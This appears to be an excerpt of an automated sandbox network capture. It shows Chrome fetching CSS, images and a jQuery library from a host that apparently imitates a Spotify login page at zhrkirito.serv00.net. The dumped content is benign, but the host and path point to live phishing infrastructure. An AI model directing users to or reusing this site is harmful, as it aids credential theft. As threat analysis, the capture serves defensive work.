                                                                                                                      2025-01-12 23:23:33 UTC1957INData Raw: 2a 7b 0d 0a 20 20 20 20 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 0d 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 7d 0d 0a 20 0d 0a 0d 0a 62 6f 64 79 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 34 31 34 31 34 20 3b 0d 0a 20 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 7d 0d 0a 0d 0a 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 0d 0a 7d 0d 0a 0d 0a 6d 61 69 6e 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d
                                                                                                                      Data Ascii: *{ outline:none; box-sizing: border-box; font-family: sans-serif; max-width:100%;} body{ background: #141414 ; margin:0;}header { background:black; padding:10px;}main{ text-align:center;


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.449752128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:32 UTC640OUTGET /spotify/app/auth/res/logo.png HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Referer: https://zhrkirito.serv00.net/spotify/app/auth/login.php
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:33 UTC227INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:33 GMT
                                                                                                                      Content-Type: image/png
                                                                                                                      Content-Length: 3282
                                                                                                                      Last-Modified: Sun, 22 Dec 2024 22:13:05 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67688ef1-cd2"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2025-01-12 23:23:33 UTC3282INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9f 00 00 00 3f 08 06 00 00 00 fe 07 1a 0e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 0c 67 49 44 41 54 78 5e ed 9c 05 ac 54 47 17 c7 09 92 14 2d 10 1c 02 a5 b8 bb 15 b7 16 0d c5 8b 13 20 b8 06 8a 85 06 29 6e a5 b8 43 d1 00 41 8b 43 70 08 ee ee ee 2e 2d 21 c0 7c df 7f 76 ee 32 77 f6 dc bd 77 df db bd cb 7b 9d 7f f2 4b e0 dc 99 d9 d9 bd 73 67 ce 9c 33 f7 c5 f8 bf 98 46 13 26 48 a3 46 e3 06 a4 51 a3 71 03 d2 a8 d1 b8 01 69 d4 68 dc 80 34 6a 34 6e 40 1a 35 1a 37 20 8d 1a 8d 1b 90 c6 48 13 2f 5e 3c 56 b9 72 65 36 68 d0 20 b6 7d fb 76 f6 e6 cd 1b a6 ea d1 a3 47 6c f5 ea d5 ac 67 cf 9e ac 68 d1
                                                                                                                      Data Ascii: PNGIHDR?sRGBgAMAapHYsttfxgIDATx^TG- )nCACp.-!|v2ww{Ksg3F&HFQqih4j4n@57 H/^<Vre6h }vGlgh


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.449754128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:32 UTC643OUTGET /spotify/app/auth/res/loading.gif HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Referer: https://zhrkirito.serv00.net/spotify/app/auth/login.php
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:33 UTC230INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:33 GMT
                                                                                                                      Content-Type: image/gif
                                                                                                                      Content-Length: 79790
                                                                                                                      Last-Modified: Sun, 22 Dec 2024 22:13:05 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67688ef1-137ae"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2025-01-12 23:23:33 UTC16154INData Raw: 47 49 46 38 39 61 c8 00 c8 00 f7 00 00 1e d7 60 1f d7 61 20 d7 61 21 d8 62 24 d8 64 26 d8 66 27 d9 66 28 d9 67 29 d9 68 2a d9 68 2b d9 69 2d da 6b 2e da 6b 2f da 6c 30 da 6d 32 db 6e 37 db 72 3a dc 74 3b dc 74 3c dc 75 3d dd 76 41 dd 79 44 de 7b 45 de 7c 46 de 7c 47 de 7d 48 de 7e 4b df 80 4e e0 82 4f e0 83 50 e0 83 51 e0 84 53 e1 86 54 e1 86 55 e1 87 59 e1 89 5a e2 8b 5b e2 8b 5c e2 8c 5d e2 8c 65 e4 92 67 e4 93 67 e4 94 68 e4 94 69 e4 95 6b e5 96 6c e5 97 6e e5 99 6f e5 99 71 e6 9a 71 e6 9b 72 e6 9b 72 e6 9c 74 e6 9d 76 e7 9e 77 e7 9f 7b e8 a2 7c e8 a2 7d e8 a3 7e e8 a4 80 e8 a6 81 e9 a6 83 e9 a7 85 e9 a9 87 ea aa 89 ea ab 89 ea ac 8a ea ac 8b ea ad 8c eb ae 8f eb af 93 ec b2 94 ec b3 96 ec b5 97 ec b5 99 ed b7 9c ed b9 9e ee ba a0 ee bc a2 ee bd a4 ef
                                                                                                                      Data Ascii: GIF89a`a a!b$d&f'f(g)h*h+i-k.k/l0m2n7r:t;t<u=vAyD{E|F|G}H~KNOPQSTUYZ[\]egghiklnoqqrrtvw{|}~
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 4e e5 e3 a6 4c 98 2a 4d 92 14 11 a2 83 c6 84 09 38 82 14 51 02 a5 cb 18 34 75 02 69 95 6a 87 cc 15 24 67 f3 ea dd cb 57 2f 8c 22 50 c4 c0 41 34 f7 e8 9c 30 4a fa 2a 5e cc 78 42 92 2e 66 f8 14 f6 29 c8 8c 94 1c 8d 33 6b e6 2b c4 0b 9c 49 93 6d 2a 3a f3 04 c5 e6 d3 a8 f3 ea b0 c2 46 51 68 98 74 b0 dc 48 4d bb 76 8e 2f 7e 5e ab 04 24 a6 48 ed df bf 4f 40 69 a3 bb 64 9f 2a 2a 80 2b 07 4e 64 8c a1 e2 1f fd 54 59 4e 5d 39 0c 2b 7b a0 6b fc 93 c5 45 f5 ef c0 55 fe 74 21 a4 bd e2 22 31 30 c0 ab 07 7e 83 cc a3 f2 11 e5 10 59 4f 9f 39 71 f8 0c 05 51 a9 cf 1f f8 93 ec f8 1d 34 49 19 38 f4 67 60 6d 2e 8c 11 60 41 7f 30 71 e0 83 b5 35 21 d7 82 6c 60 06 e1 85 a8 e9 e0 06 7e 8a 74 81 e1
                                                                                                                      Data Ascii: JH*]PJJXNL*M8Q4uij$gW/"PA40J*^xB.f)3k+Im*:FQhtHMv/~^$HO@id**+NdTYN]9+{kEUt!"10~YO9qQ4I8g`m.`A0q5!l`~t
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: d7 39 91 89 53 9f 70 71 9d a9 3f 41 92 6c 73 50 94 f7 94 9a cd d9 a0 ab 4f 58 58 a7 05 55 5d 58 87 c5 4f 7f 68 5c e9 54 a2 64 61 9d 1c 3d 8d 72 44 73 54 8c 4c 15 28 55 34 07 c4 26 3c b5 d1 9c 12 34 5f c5 09 12 cd 99 b1 93 26 80 0a 47 84 b7 57 39 42 5f 70 36 54 98 d3 18 cc dd b0 88 61 7f c4 1a 9c 18 39 41 72 ab 6a 2b 08 32 da 19 cc b9 10 dd 4d 14 07 97 06 6f df 09 d7 c5 4d 94 e4 18 5c 13 d9 8e 56 49 d0 b7 95 80 88 4d 65 08 e7 42 bf bc d9 c1 dc fe d9 34 81 02 b7 6d 9b 72 b7 ed 6d 2e 28 2d d3 1b c2 3d 11 df 24 47 db 36 f6 4c f5 da 76 02 9f e6 91 1b 5c 11 6d bf b4 87 70 5e 34 18 85 70 78 c8 44 45 70 2e 5c 1c 9f 20 00 c6 04 89 70 54 5b 68 72 dc 5f bb c4 46 70 35 18 3e 20 22 52 d7 76 06 4c 52 4c 6d e1 40 0a df d6 c4 4b 96 98 69 1b de 16 2e 22 1c d1 2a 11 7c 1b
                                                                                                                      Data Ascii: 9Spq?AlsPOXXU]XOh\Tda=rDsTL(U4&<4_&GW9B_p6Ta9Arj+2MoM\VIMeB4mrm.(-=$G6Lv\mp^4pxDEp.\ pT[hr_Fp5> "RvLRLm@Ki."*|
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 49 0a 5f da a6 0e bc 34 85 33 6f b3 47 5b 9e 42 93 e9 fe 5c 9f 28 3d e1 4e cd d9 d2 44 d8 c9 82 2d 5d 84 1d 1f 08 e8 94 82 e8 66 70 fa c0 9d 35 54 6c 28 47 c4 4e 99 a4 73 06 09 08 01 0f bd 08 ca 23 4e 14 9e 2c cc 8c 37 3d 94 00 15 6c c5 93 5e d4 c1 7d e1 49 c2 3a 47 63 89 20 f0 85 06 6c 30 5d 4e 06 01 85 f5 f0 40 52 c7 e1 1b 63 90 00 2b 9b 40 a2 9f cc 79 25 6c e2 b0 19 2e 1c 34 26 99 20 03 08 d7 33 c9 e3 10 62 a9 8d c9 01 18 08 01 13 46 88 01 91 f5 d1 1f 6f 36 71 b4 ce 40 01 0f 4a 43 09 29 f8 d0 37 fb 68 95 37 f3 ec 4c 0f c6 b0 4c 92 7c a2 0f 60 58 cc 7f 26 2a 9d 46 0a 27 09 61 d8 c3 51 35 b2 09 3d 70 21 73 ff 39 83 79 1e 51 c2 e6 2c 41 0c 7c 78 a8 44 4c 61 88 3b 84 c1 09 d6 8b d0 1b e2 c3 33 fb f8 60 09 59 e8 02 1a e6 40 24 45 b0 48 13 93 60 04 21 fe 90
                                                                                                                      Data Ascii: I_43oG[B\(=ND-]fp5Tl(GNs#N,7=l^}I:Gc l0]N@Rc+@y%l.4& 3bFo6q@JC)7h7LL|`X&*F'aQ5=p!s9yQ,A|xDLa;3`Y@$EH`!
                                                                                                                      2025-01-12 23:23:33 UTC14484INData Raw: d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 1e d7 60 20 d7 61 21 d7 62 21 d7 62 22 d7 63 24 d7 64 27 d8 66 2b d9 69 2e d9 6b 31 da 6d 33 da 6f 35 db 70 37 db 72 39 db 73 3a db 74 3c dc 75 3e dc 76 3f dc 77 40 dc 78 41 dd 79 42 dd 79 42 dd 7a 43 dd 7a 43 dd 7a 44 dd 7b 45 dd 7c 46 dd 7c 46 dd 7c 47 de 7d 48 de 7e 4a de 7f 4c df 81 4f df 83 53 e0 86 56 e0 87 59 e1 8a 5b e1 8b 5d e2 8d 5f e2 8e 61 e2 8f 62 e3 90 63 e3 91 64 e3 92 67 e3 94 6b e4 96 6f e5 99 73 e6 9c 74 e6 9d 75 e6 9e 77 e6 9f 79 e7 a0 7c e7 a2 7f e8 a4 82 e8 a6 84 e9 a8 86 e9 aa 8a ea ac 8e eb af 91 eb b2 95 ec b4 98 ec b6 9a ed b8 9c ed b9 9d ed ba 9e
                                                                                                                      Data Ascii: `````````````````````` a!b!b"c$d'f+i.k1m3o5p7r9s:t<u>v?w@xAyByBzCzCzD{E|F|F|G}H~JLOSVY[]_abcdgkostuwy|


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.449753128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:32 UTC644OUTGET /spotify/app/auth/res/remember.png HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Referer: https://zhrkirito.serv00.net/spotify/app/auth/login.php
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:33 UTC226INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:33 GMT
                                                                                                                      Content-Type: image/png
                                                                                                                      Content-Length: 507
                                                                                                                      Last-Modified: Sun, 22 Dec 2024 22:13:05 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67688ef1-1fb"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2025-01-12 23:23:33 UTC507INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2f 00 00 00 1f 08 06 00 00 00 77 5d 94 01 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 01 90 49 44 41 54 58 47 d5 96 31 4e 03 31 10 45 d3 53 b1 10 29 20 14 21 41 c1 0d 68 d2 40 47 99 82 1a 0e c2 0d a8 b8 0a 07 e0 14 48 1c 67 d8 6f c9 f1 d8 f9 e0 09 3b 8b 34 91 9e a2 f9 6b 8f bf ed b1 77 17 e3 4f 02 43 c5 28 50 31 0a 54 8c 02 15 a3 40 c5 8a a3 ed b5 9c be dd c9 f9 c7 a3 ac 3f 9f 64 fd f5 ec c3 98 0b 39 91 1b 63 b0 b1 3b 50 31 81 84 c9 30 1b 78 06 30 d6 81 93 a0 a2 1c bf dc d2 01 fe 03 8c cd 3c 11 f6 c5 b9 8c 9f bd de cb f2 e1 46 4e 2e 57 32 0c 43 fa 47 0c bd 6d 6b 9c 40 2d 60 db da 44 53 b9
                                                                                                                      Data Ascii: PNGIHDR/w]sRGBgAMAapHYsttfxIDATXG1N1ES) !Ah@GHgo;4kwOC(P1T@?d9c;P10x0<FN.W2CGmk@-`DS


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.449750128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:32 UTC581OUTGET /spotify/app/auth/res/cdn/jq.js HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                      Referer: https://zhrkirito.serv00.net/spotify/app/auth/login.php
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:33 UTC244INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:33 GMT
                                                                                                                      Content-Type: application/javascript
                                                                                                                      Content-Length: 386150
                                                                                                                      Last-Modified: Sun, 22 Dec 2024 22:13:05 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67688ef1-5e466"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2025-01-12 23:23:33 UTC16140INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 33 2e 36 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 32 32 2d 31 32 2d 32
                                                                                                                      Data Ascii: /*! * jQuery JavaScript Library v3.6.3 * https://jquery.com/ * * Includes Sizzle.js * https://sizzlejs.com/ * * Copyright OpenJS Foundation and other contributors * Released under the MIT license * https://jquery.org/license * * Date: 2022-12-2
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 22 20 2b 0a 09 09 09 77 68 69 74 65 73 70 61 63 65 20 2b 20 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 20 2b 20 77 68 69 74 65 73 70 61 63 65 20 2b 20 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 20 2b 0a 09 09 09 77 68 69 74 65 73 70 61 63 65 20 2b 20 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 20 2b 20 77 68 69 74 65 73 70 61 63 65 20 2b 20 22 2a 5c 5c 29 7c 29 22 2c 20 22 69 22 20 29 2c 0a 09 09 22 62 6f 6f 6c 22 3a 20 6e 65 77 20 52 65 67 45 78 70 28 20 22 5e 28 3f 3a 22 20 2b 20 62 6f 6f 6c 65 61 6e 73 20 2b 20 22 29 24 22 2c 20 22 69 22 20 29 2c 0a 0a 09 09 2f 2f 20 46 6f 72 20 75 73 65 20 69 6e 20 6c 69 62 72 61 72 69 65 73 20 69 6d 70 6c 65 6d 65 6e 74 69 6e 67 20 2e 69 73 28 29 0a 09 09 2f 2f 20 57 65 20 75 73 65
                                                                                                                      Data Ascii: " +whitespace + "*(even|odd|(([+-]|)(\\d*)n|)" + whitespace + "*(?:([+-]|)" +whitespace + "*(\\d+)|))" + whitespace + "*\\)|)", "i" ),"bool": new RegExp( "^(?:" + booleans + ")$", "i" ),// For use in libraries implementing .is()// We use
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 09 09 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 0a 09 09 09 21 65 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 20 22 3a 73 63 6f 70 65 20 66 69 65 6c 64 73 65 74 20 64 69 76 22 20 29 2e 6c 65 6e 67 74 68 3b 0a 09 7d 20 29 3b 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 43 68 72 6f 6d 65 20 31 30 35 2b 2c 20 46 69 72 65 66 6f 78 20 31 30 34 2b 2c 20 53 61 66 61 72 69 20 31 35 2e 34 2b 0a 09 2f 2f 20 4d 61 6b 65 20 73 75 72 65 20 66 6f 72 67 69 76 69 6e 67 20 6d 6f 64 65 20 69 73 20 6e 6f 74 20 75 73 65 64 20 69 6e 20 60 43 53 53 2e 73 75 70 70 6f 72 74 73 28 20 22 73 65 6c 65 63 74 6f 72 28 2e 2e 2e 29 22 20 29 60 2e 0a 09 2f 2f 0a
                                                                                                                      Data Ascii: return typeof el.querySelectorAll !== "undefined" &&!el.querySelectorAll( ":scope fieldset div" ).length;} );// Support: Chrome 105+, Firefox 104+, Safari 15.4+// Make sure forgiving mode is not used in `CSS.supports( "selector(...)" )`.//
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 2f 20 49 45 2f 45 64 67 65 20 73 6f 6d 65 74 69 6d 65 73 20 74 68 72 6f 77 20 61 20 22 50 65 72 6d 69 73 73 69 6f 6e 20 64 65 6e 69 65 64 22 20 65 72 72 6f 72 20 77 68 65 6e 20 73 74 72 69 63 74 2d 63 6f 6d 70 61 72 69 6e 67 0a 09 2f 2f 20 74 77 6f 20 64 6f 63 75 6d 65 6e 74 73 3b 20 73 68 61 6c 6c 6f 77 20 63 6f 6d 70 61 72 69 73 6f 6e 73 20 77 6f 72 6b 2e 0a 09 2f 2f 20 65 73 6c 69 6e 74 2d 64 69 73 61 62 6c 65 2d 6e 65 78 74 2d 6c 69 6e 65 20 65 71 65 71 65 71 0a 09 69 66 20 28 20 28 20 65 6c 65 6d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 20 7c 7c 20 65 6c 65 6d 20 29 20 21 3d 20 64 6f 63 75 6d 65 6e 74 20 29 20 7b 0a 09 09 73 65 74 44 6f 63 75 6d 65 6e 74 28 20 65 6c 65 6d 20 29 3b 0a 09 7d 0a 0a 09 76 61 72 20 66 6e 20 3d 20 45 78 70 72 2e 61 74 74
                                                                                                                      Data Ascii: / IE/Edge sometimes throw a "Permission denied" error when strict-comparing// two documents; shallow comparisons work.// eslint-disable-next-line eqeqeqif ( ( elem.ownerDocument || elem ) != document ) {setDocument( elem );}var fn = Expr.att
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 09 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 49 45 20 3c 31 30 20 6f 6e 6c 79 0a 09 09 09 09 2f 2f 20 4e 65 77 20 48 54 4d 4c 35 20 61 74 74 72 69 62 75 74 65 20 76 61 6c 75 65 73 20 28 65 2e 67 2e 2c 20 22 73 65 61 72 63 68 22 29 20 61 70 70 65 61 72 20 77 69 74 68 20 65 6c 65 6d 2e 74 79 70 65 20 3d 3d 3d 20 22 74 65 78 74 22 0a 09 09 09 09 28 20 28 20 61 74 74 72 20 3d 20 65 6c 65 6d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 20 22 74 79 70 65 22 20 29 20 29 20 3d 3d 20 6e 75 6c 6c 20 7c 7c 0a 09 09 09 09 09 61 74 74 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 3d 3d 3d 20 22 74 65 78 74 22 20 29 3b 0a 09 09 7d 2c 0a 0a 09 09 2f 2f 20 50 6f 73 69 74 69 6f 6e 2d 69 6e 2d 63 6f 6c 6c 65 63 74 69 6f 6e 0a 09 09 22 66 69 72 73 74 22 3a 20 63 72 65 61 74 65
                                                                                                                      Data Ascii: // Support: IE <10 only// New HTML5 attribute values (e.g., "search") appear with elem.type === "text"( ( attr = elem.getAttribute( "type" ) ) == null ||attr.toLowerCase() === "text" );},// Position-in-collection"first": create
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 0a 09 72 65 73 75 6c 74 73 20 3d 20 72 65 73 75 6c 74 73 20 7c 7c 20 5b 5d 3b 0a 0a 09 2f 2f 20 54 72 79 20 74 6f 20 6d 69 6e 69 6d 69 7a 65 20 6f 70 65 72 61 74 69 6f 6e 73 20 69 66 20 74 68 65 72 65 20 69 73 20 6f 6e 6c 79 20 6f 6e 65 20 73 65 6c 65 63 74 6f 72 20 69 6e 20 74 68 65 20 6c 69 73 74 20 61 6e 64 20 6e 6f 20 73 65 65 64 0a 09 2f 2f 20 28 74 68 65 20 6c 61 74 74 65 72 20 6f 66 20 77 68 69 63 68 20 67 75 61 72 61 6e 74 65 65 73 20 75 73 20 63 6f 6e 74 65 78 74 29 0a 09 69 66 20 28 20 6d 61 74 63 68 2e 6c 65 6e 67 74 68 20 3d 3d 3d 20 31 20 29 20 7b 0a 0a 09 09 2f 2f 20 52 65 64 75 63 65 20 63 6f 6e 74 65 78 74 20 69 66 20 74 68 65 20 6c 65 61 64 69 6e 67 20 63 6f 6d 70 6f 75 6e 64 20 73 65 6c 65 63 74 6f 72 20 69 73 20 61 6e 20 49 44 0a 09 09
                                                                                                                      Data Ascii: results = results || [];// Try to minimize operations if there is only one selector in the list and no seed// (the latter of which guarantees us context)if ( match.length === 1 ) {// Reduce context if the leading compound selector is an ID
                                                                                                                      2025-01-12 23:23:33 UTC16384INData Raw: 20 46 69 72 65 20 63 61 6c 6c 62 61 63 6b 73 0a 09 09 66 69 72 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 09 09 09 2f 2f 20 45 6e 66 6f 72 63 65 20 73 69 6e 67 6c 65 2d 66 69 72 69 6e 67 0a 09 09 09 6c 6f 63 6b 65 64 20 3d 20 6c 6f 63 6b 65 64 20 7c 7c 20 6f 70 74 69 6f 6e 73 2e 6f 6e 63 65 3b 0a 0a 09 09 09 2f 2f 20 45 78 65 63 75 74 65 20 63 61 6c 6c 62 61 63 6b 73 20 66 6f 72 20 61 6c 6c 20 70 65 6e 64 69 6e 67 20 65 78 65 63 75 74 69 6f 6e 73 2c 0a 09 09 09 2f 2f 20 72 65 73 70 65 63 74 69 6e 67 20 66 69 72 69 6e 67 49 6e 64 65 78 20 6f 76 65 72 72 69 64 65 73 20 61 6e 64 20 72 75 6e 74 69 6d 65 20 63 68 61 6e 67 65 73 0a 09 09 09 66 69 72 65 64 20 3d 20 66 69 72 69 6e 67 20 3d 20 74 72 75 65 3b 0a 09 09 09 66 6f 72 20 28 20 3b 20 71 75 65
                                                                                                                      Data Ascii: Fire callbacksfire = function() {// Enforce single-firinglocked = locked || options.once;// Execute callbacks for all pending executions,// respecting firingIndex overrides and runtime changesfired = firing = true;for ( ; que
